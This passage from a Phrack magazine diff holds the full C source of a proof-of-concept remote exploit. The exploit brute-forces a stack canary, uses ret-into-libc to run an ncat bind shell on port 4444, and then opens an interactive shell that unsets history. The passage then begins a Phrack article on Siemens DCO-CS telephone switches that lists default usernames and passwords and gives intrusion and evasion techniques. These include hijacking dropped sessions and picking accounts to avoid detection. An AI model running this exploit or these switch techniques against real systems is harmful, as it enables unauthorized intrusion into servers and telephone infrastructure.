+----------------------------------- CUT -----------------------------------
+
+---[ 8.2 - The exploit (moj.c)
+
+----------------------------------- CUT -----------------------------------
+/*
+ * This is Proof of Concept exploit which bypass everything (SSP 
+ * [pro-police], ASLR, AAAS, ESP) and use modified ret-into-libc technique 
+ * to execute shell.
+ *
+ * Article about modified ret-into-libc technique you can find on my web - 
+ * it was published some years ago on bugtraq and now it is very useful :)
+ *
+ * Ps. Address of ret-to-call_system@plt that you should change is
+ *     P_REL_CALLSYSTEM
+ *     The same you be done with directive P_REL_CALLVULN and P_REL_GOT. 
+ *     P_REL_CALLWRITE (info leak) is unused in this version of PoC.
+ *     P_CMD holds the command which will be executed - you can change if 
+ *     you want ;)
+ *
+ * Best regards,
+ * Adam Zabrocki
+ * --
+ * pi3 (pi3ki31ny) - pi3 (at) itsec pl
+ * http://pi3.com.pl
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <netdb.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <getopt.h>
+#include <errno.h>
+
+#define PORT 666
+#define BUFS 250
+#define START 90
+
+#define P_REL_CALLVULN      0xe0a
+#define P_REL_CALLWRITE     0xd6c
+#define P_REL_CALLSYSTEM    0xb9b
+#define P_REL_MASK          0x0FFF
+#define P_REL_GOT           0x25a4 // 0x2644
+
+#define SA struct sockaddr
+
+/* Thic CMD variable is only for PoC. You should choose it individually */
+//#define P_CMD "|| nc -l -p 4444 -e /bin/sh;"
+#define P_CMD "|| ncat -l -p 4444 -e /bin/sh;"
+
+int shell(int);
+
+int usage(char *arg) 
+{
+    printf("\n\t...::: -=[ Bypassing pro-police for PoC server by Adam "
+           "'pi3 (pi3ki31ny)' Zabrocki ]=- :::...\n");
+    printf("\n\tUsage:\n\t[+] %s [options]\n",arg);
+    printf("         -? <this help screen>\n");
+    printf("         -b <local_buff_brute_force_start_address>\n");
+    printf("         -p port\n");
+    printf("         -v <victim>\n\n");
+    exit(-1);
+}
+
+int main(int argc, char *argv[]) 
+{
+unsigned int brute = 0;
+
+    int ret, *buf_addr, global_cnt = 0;
+    char *buf,read_buf[4096],cannary[0x4] = { 0x0, 0x0, 0x0, 0x0 };
+    struct sockaddr_in servaddr;
+    struct hostent *h;
+    int elo, port=PORT, opt, sockfd, test=0, offset=0, test2 = 0;
+    int helper = 0, position_found = 0;
+    int write_addr = 0, system_addr = 0;
+
+    struct timeval tv;
+
+    while((opt = getopt(argc,argv,"p:b:v:?")) != -1) {
+        switch(opt) {
+            case 'b':
+                sscanf(optarg,"%x",&brute);
+                break;
+
+            case 'p':
+                port=atoi(optarg);
+                break;
+
+            case 'v':
+                test=1;
+                if ( (h=gethostbyname(optarg)) == NULL) {
+                    printf("gethostbyname() failed!\n");
+                    exit(-1);
+                }
+                break;
+
+            case '?':
+            default:
+                usage(argv[0]);
+            }
+    }
+
+    if (test==0)
+        usage(argv[0]);
+
+    servaddr.sin_family = AF_INET;
+    servaddr.sin_port = htons(port);
+    servaddr.sin_addr.s_addr = htonl(INADDR_ANY);
+    servaddr.sin_addr = *(struct in_addr*)*h->h_addr_list;
+
+    if (!(buf=(char*)malloc(BUFS))) {
+        exit(-1);
+    }
+
+    setbuf(stdout,NULL);
+    printf("\n\t...::: -=[ Bypassing pro-police PoC for server by Adam "
+           "'pi3 (pi3ki31ny)' Zabrocki ]=- :::...\n");
+    printf("\n\t[+] Trying to find the position of the canary...\n");
+
+
+    for (position_found=0;!position_found;global_cnt++) {
+
+        memset(buf,0x0,BUFS);
+        strcpy(buf,"vuln ");
+
+        memset(&buf[5], 0x41, START+global_cnt);
+
+        if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
+            printf("Socket() error!\n");
+            exit(-1);
+        }
+
+        if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr))) < 0) {
+            printf("Connect() error!\n");
+            exit(-1);
+        }
+/*
+        // You can optimize waiting via timeout
+        tv.tv_sec=0,tv.tv_usec=40000;
+        if ( (setsockopt(sockfd,SOL_SOCKET,SO_RCVTIMEO,&tv,sizeof(tv))) 
+           != 0) {
+            printf("setsockopt() error!\n");
+            exit(-1);
+        }
+*/
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,sizeof(read_buf));
+
+        write(sockfd,buf,strlen(buf));
+
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,32);
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,30);
+
+        write(sockfd,"quit",4);
+
+        bzero(read_buf,sizeof(read_buf));
+        ret = read(sockfd,read_buf,sizeof(read_buf));
+
+        if(ret <= 0) {
+            printf("\t[+] Found the canary! => offset = %d (+%d)\n",
+                    START+global_cnt,global_cnt);
+            position_found = 1;
+        }
+        close(sockfd);
+    }
+
+    printf("\t[+] Trying to find the canary...\n");
+
+    global_cnt--;
+    for (elo=0;elo<4;elo++) {
+        for (opt=0; opt<256; opt++) {
+
+
+
+            memset(buf,0x0,BUFS);
+            strcpy(buf,"vuln ");
+
+            memset(&buf[5], 0x41, START+global_cnt);
+            memcpy(&buf[5+START+global_cnt-1], cannary, elo);
+            buf[5+START+global_cnt-1+elo]=opt;
+
+            if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
+                printf("socket() error!\n");
+                exit(-1);
+            }
+
+            if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0) {
+                printf("connect() error!\n");
+                exit(-1);
+            }
+/*
+            // You can optimize waiting via timeout
+            tv.tv_sec=0,tv.tv_usec=40000;
+            if ( (setsockopt(sockfd,SOL_SOCKET,SO_RCVTIMEO,&tv,sizeof(tv)))
+               != 0) {
+                printf("setsockopt() error!\n");
+                exit(-1);
+            }
+*/
+            bzero(read_buf,sizeof(read_buf));
+            read(sockfd,read_buf,sizeof(read_buf));
+            do {
+                unsigned int an_egg = START+global_cnt+5+elo;
+                write(sockfd,buf,an_egg);
+            } while(0);
+
+            bzero(read_buf,sizeof(read_buf));
+            read(sockfd,read_buf,32);
+            bzero(read_buf,sizeof(read_buf));
+            read(sockfd,read_buf,30);
+
+            write(sockfd,"quit",4);
+
+            bzero(read_buf,sizeof(read_buf));
+            ret = read(sockfd,read_buf,sizeof(read_buf));
+
+            if (ret > 0) {
+                printf("\t[+] Found byte! => 0x%02x\n",opt);
+                cannary[elo] = opt;
+                close(sockfd);
+                break;
+            }
+            /* If we miss somehow the byte... */
+            if (opt == 255)
+               opt = 0x0;
+            close(sockfd);
+        }
+    }
+
+    printf("\t[+] Overwriting frame pointer (EBP?)...\n");
+    printf("\t[+] Overwriting instruction pointer (EIP?)...\n");
+    printf("\t[+] Starting bruteforce...\n");
+
+    for (offset=0,test2=0x0,opt=0;test&&!offset;test2++,opt++) {
+        memset(buf,0,BUFS);
+        strcpy(buf,"vuln ");
+
+        memset(&buf[5], 0x41, START+global_cnt);
+        memcpy(&buf[5+START+global_cnt-1], cannary, elo);
+
+        buf_addr=(int*)&buf[5+START+global_cnt-1+elo];
+        helper = (P_REL_CALLVULN & P_REL_MASK) | (test2 << 12);
+
+        *(buf_addr++) = 0xdeadbabe;
+        *(buf_addr++) = (P_REL_GOT + (test2 << 12));  // used by the GOT.
+        *(buf_addr++) = helper;
+
+        if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
+            printf("socket() error!\n");
+            exit(-1);
+        }
+
+        if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr))) < 0) {
+            printf("connect() error!\n");
+            exit(-1);
+        }
+/*
+        // You can optimize waiting via timeout
+        tv.tv_sec=0,tv.tv_usec=40000;
+        if ( (setsockopt(sockfd,SOL_SOCKET,SO_RCVTIMEO,&tv,sizeof(tv))) 
+           != 0) {
+            printf("setsockopt() error!\n");
+            exit(-1);
+        }
+*/
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,sizeof(read_buf));
+
+        write(sockfd,buf,5+START+global_cnt-1+elo+(4-1)*4);
+
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,32);
+
+        bzero(read_buf,sizeof(read_buf));
+        read(sockfd,read_buf,30);
+
+        write(sockfd,"quit",4);
+
+        bzero(read_buf,sizeof(read_buf));
+        ret = read(sockfd,read_buf,sizeof(read_buf));
+
+        if(ret > 0) {
+
+            /* At that point we successfully called vuln_func()
+               which means that we "probably" returned in [I1]
+
+     e67:       8b 44 24 1c             mov    0x1c(%esp),%eax
+     e6b:       89 44 24 08             mov    %eax,0x8(%esp)
+     e6f:       8b 44 24 24             mov    0x24(%esp),%eax
+     e73:       89 44 24 04             mov    %eax,0x4(%esp)
+     e77:       8d 44 24 34             lea    0x34(%esp),%eax
+     e7b:       89 04 24                mov    %eax,(%esp)
+     e7e:       e8 3e 00 00 00          call   ec1 <vuln_func>   [I1]
+            */
+
+            write_addr = (P_REL_CALLWRITE & P_REL_MASK) | (test2 << 12);
+            system_addr = (P_REL_CALLSYSTEM & P_REL_MASK) | (test2 << 12);
+            printf("\t[+] Success! :) (0x%.8x)\n",helper);
+            printf("\t\t-> @call_write = 0x%.8x\n",write_addr);
+            printf("\t\t-> @call_system = 0x%.8x\n",system_addr);
+            offset=1;
+        }
+        close(sockfd);
+    }
+
+    if (!offset) {
+        printf("\t[-] Exploit Failed! :(\n\n");
+        exit(-1);
+    }
+
+    printf("\t[+] Trying ret-into-system...\n");
+
+    memset(buf,0x0,BUFS);
+    strcpy(buf,"vuln ");
+
+    memset(&buf[5], 0x41, START+global_cnt);
+    memcpy(&buf[5], P_CMD, strlen(P_CMD));
+
+    memcpy(&buf[5+START+global_cnt-1], cannary, elo);
+
+    buf_addr=(int*)&buf[5+START+global_cnt-1+elo];
+    test2--;
+
+    *(buf_addr++) = 0xdeadbabe;
+    *(buf_addr++) = (P_REL_GOT + (test2 << 12));  // used by the GOT.
+    *(buf_addr++) = 0x41414141;
+    *(buf_addr++) = system_addr;
+
+    if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
+        printf("Socket() error!\n");
+        exit(-1);
+    }
+
+    if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr))) < 0) {
+        printf("Connect() error!\n");
+        exit(-1);
+    }
+/*
+    // You can optimize waiting via timeout
+    tv.tv_sec=0,tv.tv_usec=40000;
+    if ( (setsockopt(sockfd,SOL_SOCKET,SO_RCVTIMEO,&tv,sizeof(tv))) != 0) {
+        printf("setsockopt() error!\n");
+        exit(-1);
+    }
+*/
+    bzero(read_buf,sizeof(read_buf));
+    read(sockfd,read_buf,sizeof(read_buf));
+
+    write(sockfd,buf,4+START+global_cnt+4+4*4);
+ 
+    bzero(read_buf,sizeof(read_buf));
+    ret = read(sockfd,read_buf,32);
+
+    bzero(read_buf,sizeof(read_buf));
+    ret = read(sockfd,read_buf,30);
+
+    if(ret == 30) {
+        printf("\t[+] Connecting to bindshell...\n\n");
+
+        sleep(2);
+        if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
+            printf("Socket() error!\n");
+            exit(-1);
+        }
+        servaddr.sin_port = htons(4444);
+
+        if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) <0 ) {
+            printf("Connect() error!\n");
+            exit(-1);
+        }
+        shell(sockfd);
+    }
+
+    return 0;
+}
+
+int shell(int fd)
+{
+    int rd ;
+    fd_set rfds;
+    static char buff[1024];
+    char INIT_CMD[] = "echo \"pi3 was here :-)\"; "
+    "echo \"Executing shell...\"; "
+    "unset HISTFILE; echo; id; uname -a\n";
+
+    write(fd, INIT_CMD, strlen( INIT_CMD ));
+
+    while (1) {
+        FD_ZERO(&rfds);
+        FD_SET(0, &rfds);
+        FD_SET(fd, &rfds);
+
+        if (select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
+            perror("[-] Select");
+            exit( EXIT_FAILURE );
+        }
+
+        if (FD_ISSET(0, &rfds)) {
+
+            if ( (rd = read(0, buff, sizeof(buff))) < 1) {
+               perror("[-] Read");
+               exit(EXIT_FAILURE);
+            }
+
+            if (write(fd,buff,rd) != rd) {
+               perror("[-] Write");
+               exit( EXIT_FAILURE );
+            }
+        }
+
+        if (FD_ISSET(fd, &rfds)) {
+            if ( (rd = read(fd, buff, sizeof(buff))) < 1) {
+               exit(EXIT_SUCCESS);
+            }
+            write(1, buff, rd);
+        }
+    }
+}
+----------------------------------- CUT -----------------------------------
diff --git a/phrack67/14.txt b/phrack67/14.txt
new file mode 100644
index 0000000..1706f12
--- /dev/null
+++ b/phrack67/14.txt
@@ -0,0 +1,2051 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x43, Phile #0x0e of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=-----=[ Notes Concerning the Security, Design and Administration ]=----=|
+|=-----------=[ of Siemens DCO-CS Digital Switching Systems ]=-----------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ By The Philosopher ]=-----------------------=|
+|=--------------------=[ philosopher2600@gmail.com ]=--------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+Relevance/Context-
+
+The Siemens DCO-CS (Digital Central Office Carrier Switch), the premier 
+Class 5 digital local office switching system to be introduced onto the 
+American PSTN, (by Stromberg-Carlson-Siemens had not yet purchased the 
+product line) was originally installed in 1977 in Richmond Hill, Virginia. 
+Designed as a robust switch rich in features primarily to be used for 
+smaller LECs, the DCO was produced for over a decade until Siemens, which 
+acquired the product line in 1990, halted production to focus upon 
+marketing the EWSD. Nonetheless the DCO-CS remains in relatively widespread
+use throughout the PSTN, often in the possession of smaller CLECs (usually
+servicing rural areas). For those who wish to explore PSTN switches as well
+as those with the objective of securing them, the DCO-CS is worthy of 
+examination as security of any substance is largely nonexistent. 
+
+In light of the above historical information, evidently attributable 
+becomes the extremely poor security of the DCO-CS to the context of the 
+time period in which it was initially designed, within nearly a decade 
+prior to the wide proliferation of the hacker culture potentially 
+interested in unauthorized entry into telco switches; in addition, the 
+mentioned relative inclusiveness of features especially as were developed 
+and added to the existing MMI over a lengthy period of time serves to 
+establish the potential to defeat the security precautions built into the 
+switch with its own valid MMI commands. One example: although this is not 
+directly related to security, many commands in the debug utilities (GBUG, 
+FPBUG, DEBUG, etc.) in certain versions of the DCO-CS operating system are 
+redundant in that they are identical yet named differently, so that when 
+"HELP COMMAND" is entered at the prompt, identical help data will be 
+displayed for both command names, one of which is usually abbreviated. 
+Demonstrative this example is of the layered and almost modular evolution 
+of the DCO MMI. Software updates/upgrades are seemingly uploaded in a 
+modular fashion without regard for the previous state of the software in 
+question. The modularity of the interface is further reflected in the 
+incompatibility of particular utilities with the standard menu 
+characteristics. It may be observed, for example, that certain utilities 
+do not contain a "HELP" option as is typical, and that certain utilities 
+use a linear parameter input system rather than a menu-driven system. It 
+was likely anticipated upon the design of such programs/commands that the 
+user would be experienced in and knowledgeable of their usage, rendering an
+extensive help file unnecessary.
+					
+A Distinction of DCO Terminology-
+
+The words "program", "utility", and "command" will be used somewhat 
+interchangeably throughout this document, in reference to the commands 
+prefixed with a "$" at the main MMGR prompt (DCO>) that serve to invoke 
+interactive menu/parameter systems with specific functions. Also, "DCO" 
+actually refers to older software revisions prior to the Siemens 
+acquisition of the line, which was henceforth known as "DCO-CS", but here 
+it will simply be used as an abbreviation of sorts for the latter, since 
+the material in this article applies to most software revisions unless 
+stated otherwise. Also, DCO can refer to the entire DCO family of switches,
+including DCO-E, DCO-SE, and DCO-RLS.
+
+ Objectives-
+
+In formulating the structure of this paper I encountered minor difficulty 
+in the establishment of a consistent method of organization and concept 
+presentation. Initially I intended it to concern solely vulnerabilities 
+inherent in the design of the DCO-CS and commensurate methods of exploiting
+them in order to maximize the concealment of one's presence in such a 
+system. Quickly I realized, however, that a great deal of explanation of 
+switch operation was necessary to provide a context in which to discuss 
+techniques of intrusion and anti-detection, and that documentation/articles
+currently available to the underground are inadequate and quite lacking in 
+this regard; however, they are recommended reference material, for at 
+minimum they contain the text of the help files of the DCO and a small 
+amount of basic access suggestions. Consequently this writing exhibits both
+modularity and general information, encompassing sections concerning 
+specific points of interest in conjunction with occasionally redundant 
+material regarding the switch itself. This facilitates rapid look-up and 
+browsing through specific techniques, while providing beginning readers 
+with a satisfactory base of navigational knowledge. It will be assumed, 
+though, that the reader has access to the help file text, available in 
+"Guide to navigating and using DCO", written by DemonBytez of CyBrids CSE, 
+and Mr. Nobody's "The DCO-CS Operating System", both available in various 
+locations on the Internet. One should also possess at least the background 
+knowledge covered in both of these articles in order to enhance one's 
+comprehension of much of the following material. In addition to technical
+information surrounding the DCO-CS with an obvious emphasis upon security,
+the following also contains the observations of the author as to the 
+administration of such switches and specifically common practices related 
+thereto. As the title suggests, these writings, while they present a 
+coherent article that one may fruitfully follow from introduction to 
+conclusion, exhibit the general form of notes. Specific techniques are 
+presented in a sort of "Problem/Solution" format. Also, for evident reasons
+ of which I am confident the reader is aware, the location data, dates, and
+ times have been altered or omitted from the captures included herein. 
+Specific node/site identification information is replaced with 
+"DCO_CITYDATA" in the following captures, and all dates and times are 
+either fictitious examples or zeroes simply designed to demonstrate the 
+general format of the messages. Also, another important note of which to be
+ mindful is that, while to the extent of the author's knowledge all of the 
+material contained within this article is correct, the observations made 
+will not necessarily apply to every DCO switch installation everywhere. 
+They are generalizations derived from a small sample size and should be 
+considered as such.
+
+
+
+Speculative and Factual Observations as to the Nature of DCO Access 
+-------------------------------------------------------------------
+
+                                                 and General Administration
+                                                 --------------------------
+
+DCO-CS Topology-
+
+Note: "TTY" herein is used in accordance with its definition, "A generic 
+term for any computer terminal or associated serial interface" and 
+"terminal" is used in accordance with the definition, "a device 
+communicating over a line". (Source: Wikipedia @ http://www.wikipedia.org)
+No references to teletypes or TDDs (Telecommunication Devices for the Deaf)
+are intended.
+
+Like the Lucent 5ESS, the Siemens DCO-CS is administered through different 
+TTYs (although, unlike the 5ESS, access to the DCO is not divided into as
+many specialized "channels"), with different attributes and functions. The
+four types of terminals on the switch, as listed in the help file of the 
+SETTYP option of the SECTTY utility, are UNEQ (unequipped), CRT (video 
+display-the I/O terminals from which the switch is directly administered), 
+TTP (paper printer), and MODEM. The identifying format of these terminals 
+is TTXX, where XX represents two digits. TT00 is the default system master
+console, the terminal from which the MMI as well as various automatic 
+utilities are consistently run and at which all information, error and 
+alarm messages terminate (unless they are directed elsewhere-see later in 
+the document for further information). Dialups connect to other CRT 
+terminals for remote access.
+
+MMI Idiosyncrasies-
+
+A few notes on the use of the MMI: first, a semicolon ";" serves the same 
+function as a <CR> (carriage return). Backspaces are displayed as "u". 
+Within a few utilities, "EXIT" will take effect immediately after being 
+typed (without a <CR> or ;). If one is idle for a while at a prompt or 
+menu, "^U" will appear and the prompt will be re-displayed. 
+
+
+ Account/User Hierarchy and Structure- 
+
+While the hierarchical filesystem arrangement of the DCO-CS bears a 
+striking fundamental resemblance to that of UNIX, organized a similar 
+hierarchy of directories and subdirectories with predefined permissions, 
+the user administration system exhibits numerous significant differences in
+its structure. For example, there exists no "root" superuser with 
+unbridled access to everything, and no user account may interfere directly 
+in the affairs of another ("directly" here defined as "from the (same) 
+shell/session") as might be accomplished through successful execution of 
+the UNIX "su" command. User accounts are instead divided and categorized 
+into certain groups with certain "purposes" on the switch in anticipation 
+of differing necessities. The default groups are ADMIN, TMRS, STATUS, 
+MAINT, SECURE, NAC, ESPF, and SCAT respectively; by default their access is
+assigned according to the necessary tasks of each type. The access rights 
+of accounts are not quantitatively equivalent, either-certain, more 
+generally used accounts are able to access far more by default than more 
+specialized accounts, the access of which is restricted to only those 
+utilities relevant to their intended functions. All of the usernames and 
+passwords to the various accounts within these groups are contained in the 
+file printed and modified using the utility $PASSWM. These may or may not 
+be set to the default, but it is rather likely that they will be, and even 
+if this is not the case the passwords are unlikely to be very complex due 
+to the limitations imposed by the MMI (passwords on a DCO may be at maximum
+eight characters in length, and only alphanumeric) and simple human apathy;
+ in many instances it would seem as if extremely simplistic and 
+easily-guessable/crackable passwords are used on switches due to a 
+disbelief in the plausibility of unauthorized access. Regardless, the 
+default passwords for all pre-programmed usernames are simply the usernames
+themselves-for instance, the SCAT/SCAT username/password combination. A 
+concise table of DCO default accounts is as follows:
+
+DCO Defaults
+____________
+Username Password  Group
+======== ========  ===== 
+ADMIN    ADMIN	   ADMIN
+SECURE   SECURE    SECURE
+TMRS	 TMRS	   TMRS
+SCAT     SCAT	   SCAT
+MAINT    MAINT     MAINT
+STATUS   STATUS    STATUS
+NAC      NAC       NAC
+ESPF     ESPF      ESPF
+
+
+It is significant to the attainment and preservation of one's access on a 
+DCO-CS switch to understand the previously mentioned expected "uses" of 
+each group of accounts, as one ought to align explorations of the switch 
+with the anticipated functions for reasons of stealth-an unauthorized user 
+is far less likely to be detected when using certain accounts for certain 
+functions that they are intended to be "legitimately" used for. The 
+execution of certain utilities while logged in under certain accounts might
+be viewed as either suspicious or routine by a watchful administrator, 
+depending upon the account and context in which the activity occurs. 
+Although a few techniques exist that serve to provide such a user with a 
+greater degree of "freedom" in this regard by concealing from those 
+monitoring the switch evidence of non-routine activity as is covered 
+elsewhere in this article, it is still useful and certainly prudent to 
+coincide one's activity with appropriate accounts in a limited number of 
+instances. Plus, it is important to consider that the efficient and 
+stealthy employment of the techniques that follow may not always be 
+practical or possible, so this general method of remaining proverbially 
+"under the radar" is fundamentally beneficial. An explanation of the 
+various groups/default accounts follows:
+
+ADMIN - This is an administrative group/account, used primarily for the 
+purposes of administering the various tables and databases on the switch, 
+especially those that pertain to network/routing functions. What the 
+authors of the previously mentioned DCO articles obviously failed to 
+realize, in their insinuations to the effect that ADMIN is an all-powerful 
+account with extremely extensive access rights, is that ADMIN is merely 
+another account with access rights defined according to the necessary tasks
+of its group. It lacks access to a great deal by default, actually, 
+especially files and utilities concerning switch security. The access 
+rights of ADMIN often overlap with those of MAINT; therefore, it is 
+necessary to understand the differentiations between them, revealed 
+through a closer examination of the areas in which the two accounts/groups 
+do not overlap. MAINT, as explained in greater detail later, is an account 
+intended to be used for the performance of routine maintenance 
+functions-the administration of such tables is not routine maintenance, as 
+is reflected in the access rights of the MAINT group/account. The default 
+access of the admin account may also be conceptualized as the bridge of 
+sorts between "intra-switch" and "extra-switch" functions-that is, 
+functions (and corresponding utilities/files) that are related only to the 
+switch itself (intra-switch), and those with a broader sphere of influence 
+on the network (extra-switch). See the "Utility Diagram" for more 
+information on and examples of this concept. Examples of strictly 
+intra-switch functions include disk operations, processor operations, 
+debugging, etc.-similarly, examples of extra-switch functions include call 
+tracing, routing, trunk operations, WATS number functions, etc. ADMIN by 
+default also has access to intra-switch administrative utilities such as 
+ABNUTL (PERFORM AUTOMATIC BALANCE NETWORK FUNCTIONS), AUDIT (VERIFY S/W 
+RECORD OF H/W STATES MATCH ACTUAL H/W), COPY (COPY DATABASES FROM MEMORY TO
+DISK), etc. where it overlaps with MAINT. 
+
+SECURE - The access of SECURE largely overlaps with all other account 
+groups on the utilities to which all or nearly all other account groups 
+have default access ($ABORT, $AMPUTL, $CONFIG, $DUMPER, $HEY, etc.). Its 
+specialization is revealed, though, in the utilities accessible only by it 
+and SCAT, or it, SCAT, and MAINT. These include various alarm utilities, 
+$PASSWM, $BLDINH, and $SECTTY-all utilities regarding switch security, as 
+the name of the group implies. In a limited number of cases SECURE may be 
+less conspicuous than SCAT if only these sorts of utilities must be 
+accessed. 
+
+TMRS - This group/account is primarily intended for uses related to the 
+Traffic Measurement and Recording System (TMRS), a system that gauges 
+network traffic through the switch and generates reports with pertinent 
+information. On a side note, TMRS may often be an active task on the master
+console. It is able to access many intra-switch functions necessary to the
+expedient operation of TMRS, as might be assumed-debug utilities, 
+configuration control, etc. Its access rights frequently overlap with those
+of ADMIN and STATUS.
+
+SCAT - The closest group/account present on the DCO-CS to a "superuser". 
+SCAT is an acronym for "Stromberg-Carlson Assistance Team", the DCO-CS 
+equivalent of ETAS on a DMS-100. The function of SCAT, while the DCO-CS 
+product line was supported by Stromberg-Carlson/Siemens, was to provide 
+technical support for the install base in the instance of technical 
+problems/failures, especially during emergencies (critical equipment 
+failure, software issues, etc.). As a result, SCAT is authorized by default
+to access nearly everything on the switch within the filesystem, usually 
+with the highest access rights possible (typically RWX), as, in the event 
+of an emergency, such omnipotent access would be vitally necessary. The RWX
+permission is a significant distinction of the SCAT group as most other 
+account groups only have read/execute permission on most files. However, 
+there are a few files on the switch that SCAT is not permitted to access 
+(by default, naturally)-for instance, the utility $AMCDMP (that which 
+administers AMA message thresholds). By default, SCAT is often the only 
+account/group authorized to log in through the dial-up ports, as only SCAT 
+would usually require remote access to the switch. Logging in as SCAT is 
+extremely conspicuous, though, particularly at odd hours, as the 
+account/group is NOT supposed to be used for routine/ordinary tasks. It 
+would be advisable from an unauthorized user's standpoint to perhaps log in
+as SCAT once in order to authorize other account groups to log in through 
+the dialup(s), until the attentiveness of those overseeing the switch's 
+operation is gauged. 
+
+MAINT - MAINT is the general maintenance group/account on the DCO-CS; as 
+stated previously, it is used primarily for the performance/execution of 
+routine (and non-routine) tasks related to switch maintenance. As such, it 
+is authorized to access a great deal, often exclusively, where SCAT is the 
+only other account group with access rights on certain files. MAINT is the
+ only default account group/account, in fact, that is "exclusively" 
+authorized to access certain utilities in this manner. AMA is an example of
+ a such a utility to which only MAINT and SCAT have access rights in the 
+default/typical configuration. As might be expected, MAINT is mainly able 
+to access intra-switch functions. One preferred, recommended account for 
+preliminary exploration is MAINT, for it, as a maintenance account, is by 
+default enabled to access quite a few significant files and programs, and 
+suspicions may be less aroused should it be seen logging in at odd hours 
+and/or constantly. 
+
+STATUS - The STATUS group/account is, as its name implies, used for 
+checking and occasionally modifying the status of the system. Its access 
+overlaps frequently with ADMIN, MAINT, TMRS and, of course, SCAT; the 
+default access of STATUS is confined to "intra-switch" utilities and the 
+occasional utility not easily classified as either "intra-" or "extra-" 
+switch. Most of the utilities to which STATUS is assigned default access 
+are used for such functions as alarm management, various types of 
+verification, disk functions, conversion of equipment numbers, etc. 
+
+NAC - NAC is an acronym for "Network Access Control"-the administration 
+charged with overseeing the various pieces of equipment connected to the 
+network and general network interactions. Expectedly, its default access 
+mainly lies with "extra-switch" network utilities and the those used to 
+modify the aforementioned tables, also accessible with ADMIN. The NAC 
+terminal and thus group may not be equipped on a particular switch (see 
+"$SECTTY"), so it may not be possible to log in under the NAC default 
+account. 
+
+ESPF - ESP denotes, "Essential Service Protection". Along with ADMIN, NAC 
+and SCAT, ESPF is typically able to access "extra-switch" utilities such as
+those related to routing, the hotline database, INWATS, class of service, 
+etc., all "essential services". As with NAC, the "ESPF option" may not be 
+equipped on a particular switch, and thus the account/group associated with
+it may be unused. The $STATUS utility may be used to determine if it is 
+equipped:
+
+STA> AREA TO DISPLAY (AREA=HELP) > ESPF
+
+   DCO_CITYDATA
+   09-00-00 00:00:00 MONDAY   ESPF STATUS REPORT:
+
+   STATUS: ESPF OPTION NOT EQUIPPED
+
+
+   STATUS COMPLETE                                                              
+
+
+Attainment of Access
+--------------------
+
+Upon connecting to a TTY via a dialup or another method, the LOGIN utility 
+is invoked automatically, which will prompt the user for the username and 
+password necessary to log in. By default ten attempts at login (entries of 
+a username and password pair) are permitted before the following message is
+displayed, indicating an excess of unsuccessful attempts:
+
+DCO_CITYDATA 09-00-00 00:00:00 LOGIN  TT01 
+   MP .0676:TTY=TT1 EXCESSIVE LOGIN ATTEMPTS
+
+Subsequently the user will be "locked out" of the terminal for a period of 
+approximately five minutes in which the system remains unresponsive to 
+input. The amount of login attempts made is not "reset" if one disconnects 
+from the dialup/terminal and reconnects; instead, the tracking of login 
+attempts is based upon time-one must wait a few minutes prior to attempting
+ten more login attempts.
+
+
+Unauthorized Execution- 
+
+Prior to logging on to the switching station, the user is required within 
+approximately 15 seconds following successful connection to send a hard 
+break or a <CR> in order to display the prompt. Within this 15 second 
+period a vulnerability exists whereby a valid MMI (man-machine interface) 
+command typed and sent will be dutifully executed by the DCO, allowing 
+temporary control of the MMI command flow to anyone calling the dialup! 
+Potential for great compromise of the system exists if the attacker runs a 
+command such as $PASSWM, which prints a complete list of user accounts and
+passwords on the switch in clear-text! Note: on the latest software 
+release, that released in 2003, the maintenance processor (MP) must be 
+experiencing a malfunction or otherwise be bogged down with an influx of 
+tasks for this technique to work properly. Of all of the vulnerabilities 
+presented here the execution of this is the most variable-it has been known
+to occur, though, in instances of an MP malfunction, specifically on the 
+DCO-SE (see "An Additional Note:" for more information).
+
+Absence of Automatic Logout- 
+
+Like several older versions of UNIX, the DCO-CS does not automatically log 
+out of a session in the instance of user disconnection from the 
+dialup/terminal. Anyone calling the switch will be thus enabled to 
+"drop in" on the other user's session in all aspects, in addition to being 
+able to execute commands if a user left the session open while hanging up 
+the connection/modem. This is task-specific-that is, if a task is not 
+aborted and the user who executed it hangs up, the sub-prompt for that task
+will be displayed to anyone calling the switch thereafter as that task will
+be active. This state may include tasks only supposed to be executable by 
+user accounts with higher levels of access. The sole measure necessary to 
+ensure success in gaining control of a session and hence potentially the 
+entire switch (as access may be modified- privileges escalated, depending 
+upon the account temporarily "hijacked" in this fashion, etc.) is to 
+consider the time zone in which the object switch is located, in order to 
+determine prime hours of operation and of account access and usage. In the 
+instance that the would-be intruder is physically unable to monitor the 
+dialup/port for dropped sessions and exploit them, a simple script written 
+in a language compatible with the terminal client of choice is all that is 
+required. Thus, this single characteristic of the switch-among others, it 
+is certain, seen previously and henceforth in this admittedly alinear 
+document-ensures that one who accrues the knowledge of a dialup is very
+nearly guaranteed successful infiltration/ penetration of it, even in the 
+face of other, also ineffective barriers erected presumably for purposes of
+security. However, one may experience a limited degree of difficulty with 
+this method of intrusion in the instance that one has logged in via the 
+dialup port and properly logged out, in which case another one of the 
